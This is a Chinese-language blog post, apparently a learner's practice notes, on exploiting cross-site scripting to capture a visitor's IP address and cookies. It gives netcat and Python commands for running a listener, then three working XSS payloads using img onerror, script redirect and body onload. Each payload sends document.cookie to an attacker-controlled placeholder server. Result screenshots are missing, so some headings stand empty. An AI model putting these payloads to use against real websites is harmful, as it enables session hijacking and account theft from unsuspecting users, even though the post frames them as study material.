前言
学习XSS注入很久了,XSS主要的情况三分天下:反射型、存储型、DOM型;今天要研究的是XSS的利用,曾经有人问我XSS怎么利用的,我也只知道XSS在网页中嵌入代码,获取目标IP、Cookie,但是从来没有实践过,今天浏览FreeBuf时,发现一篇XSS利用文章,哈哈哈……于是乎,实践一下……
准备
为了获取目标IP及ookie,实践开始之前,需要准备一个东西:VPS,但是我没办法准备,所以只好一些简单的方法:基本的思想是,获取目标IP,将IP返回到我们指定的IP端口上,我们监听这个端口,获取返回的IP信息。
利用netcat
如果系统中有NC,可以运行命令:
nc -vil 8080
利用python
只要安装了python,并添加了环境变量,就可以在DOS中运行:
Python -m SimpleHTTPServer 8080
注意:这个命令只能在DOS中运行,不能在python交互式环境中运行,否则会出现如下情况:
注意:以上两种方法的DOS窗口都不能关闭,否则失败。
获取IP及Cookie代码
- img标签
<img src=x onerror = document.body.appendChild(document.createElement('img')).setAttribute('src','http://VPS地址:80/?='+document.cookie); >- script标签
<script>window.location.href='http://VPS地址/?cookie='+document.cookie</script>- body标签
<body onload=eval(“document.body.appendChild(document.createElement('img')).setAttribute('src','http://VPS地址/?='+document.cookie);”)></body>过程
先使用命令:Python -m SimpleHTTPServer 8080;
2.使用以上3个标签中的一种编写成HTML文件,并访问;- img标签
img标签运行结果:
script标签
script标签运行结果:
body标签
- body标签运行结果:
- img标签
其实XSS还有其他利用方法,需要更加深入的研究、发掘。但是仅仅获取目标IP绰绰有余了。
参考文章:(http://www.freebuf.com/sectool/159689.html)